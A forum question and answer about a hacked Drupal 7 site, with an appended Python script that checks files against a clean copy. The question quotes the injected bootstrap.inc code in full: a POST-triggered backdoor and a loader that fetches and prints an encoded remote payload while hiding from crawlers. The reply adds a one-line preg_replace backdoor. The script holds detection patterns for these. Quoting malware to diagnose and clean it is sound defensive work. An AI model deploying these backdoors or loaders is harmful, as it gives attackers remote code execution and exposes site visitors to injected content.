Drupal - includes/bootstrap.inc hacked/changed constantly
My hosting provider warned me that the bootstrap.inc file is connecting to an infected host. The issue is meant to be happening between lines 771 and 808 of the includes/bootstrap.inc file (code below).
This file is somehow changed (once a week), from 120 KB to 123 KB. Whenever it happens, I try to upload a clean file. If the file is changed/hacked, the hosting response takes longer, 10-15 seconds.
The Drupal 7 is updated to 7.41, and the modules are up to date. The code that's causing the issue is somewhere between those lines (I suspect the "cookie" part). The infected/added part that the hosting provider warned me about:
$_passssword = '2505363ea355401256fe974720d85db8';
$p = $_POST;
if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');
if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
    echo('<!--checker_start ');
    $tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
    echo(substr($tmp, 50));
    echo(' checker_end-->');
}
unset($_passssword);
$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
    if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
        $bad_url = true;
        break;
    }
}
$cookie_name = 'php_session_php';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
    // setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
    // $url = base64_decode('a3d3czkslda2lts0ltuwltoxlgfvbgqspgjvc2tijxz3blxwbhzxygy+ndmwmdc5ndsymjcyoti6mje=');
    $url = decrypt_url('a3d3czkslda2lts0ltuwltoxlgfvbgqspgjvc2tijxz3blxwbhzxygy+ndmwmdc5ndsymjcyoti6mje=');
    $code = request_url_data($url);
    // if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
    if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
        $echo_done = true;
        print $decoded;
    }
}//iend
I'm no back-end developer, and I've been using bootstrap for a hobby-related project for 8 years.
I tried to clean D7 (reuploaded fresh includes and modules, apart from /sites/). I tried to check it on popular scanners.
Does anyone have an idea how to block changes to bootstrap.inc? Are there successful tools for that, or modules for scanning? Or maybe someone recognizes the exploit and can give me a tip on where it's coming from?
Thank you in advance.
I had the same hack on my Drupal site. The code put in the bootstrap.inc file looked identical to yours.
Apart from the changes to bootstrap.inc, the hackers installed multiple backdoors in various modules. I was able to find the backdoors using the Hacked module, which allows you to find modified files.
The backdoors in Drupal looked similar to this code:
<?php @preg_replace('/(.*)/e', @$_POST['ttqdgkkfkolmt'], '');
This code uses a vulnerability in preg_replace, which allows attackers to execute random PHP code using a simple HTTP POST request. (The preg_replace vulnerability is resolved in PHP version > 5.5)
Hope this helped. Good luck finding the backdoors!
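An added example, not part of either post and not the Hacked module's code: a minimal version of the check the answer describes, comparing a live tree against a clean reference copy of the same versions and searching every file for the strings seen in the two quoted samples. The names `audit` and `demo`, the directory layout and the sample files are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Strings and shapes taken from the two samples quoted on this page.
INDICATORS = {
    "preg_replace /e on request data": re.compile(
        rb"preg_replace\s*\(\s*['\"].*?/[a-z]*e[a-z]*['\"]\s*,\s*"
        rb"@?\$_(POST|GET|REQUEST|COOKIE)", re.I),
    "injected bootstrap.inc names": re.compile(
        rb"\$_passssword|decrypt_url\s*\(|request_url_data\s*\(", re.I),
}

def audit(site, clean):
    """Compare a live tree with a clean reference tree of the same versions."""
    report = {"modified": [], "unexpected": [], "indicators": []}
    for f in sorted(p for p in Path(site).rglob("*") if p.is_file()):
        rel = f.relative_to(site)
        ref = Path(clean) / rel
        data = f.read_bytes()
        if not ref.is_file():
            report["unexpected"].append(rel.as_posix())   # no clean counterpart
        elif data != ref.read_bytes():
            report["modified"].append(rel.as_posix())     # differs from clean copy
        for name, rx in INDICATORS.items():
            if rx.search(data):
                report["indicators"].append((rel.as_posix(), name))
    return report

def demo():
    """Build two small constructed trees (not real Drupal files) and audit them."""
    root = Path(tempfile.mkdtemp())
    files = {
        "clean/includes/bootstrap.inc": b"<?php\nfunction drupal_bootstrap() {}\n",
        "clean/modules/node/node.module": b"<?php\nfunction node_help() {}\n",
        "site/includes/bootstrap.inc": b"<?php\nfunction drupal_bootstrap() {}\n"
            b"$url = decrypt_url('PLACEHOLDER'); $code = request_url_data($url);\n",
        "site/modules/node/node.module": b"<?php\nfunction node_help() {}\n",
        "site/modules/node/cache.php": b"<?php @preg_replace('/(.*)/e', @$_POST['k'], '');\n",
    }
    for name, body in files.items():
        path = root / name
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(body)
    return audit(root / "site", root / "clean")

if __name__ == "__main__":
    print(demo())
```

Files under /sites/ only have a counterpart if the reference tree also holds clean copies of the same contributed module versions; otherwise they are all listed as unexpected and only the indicator scan is meaningful for them.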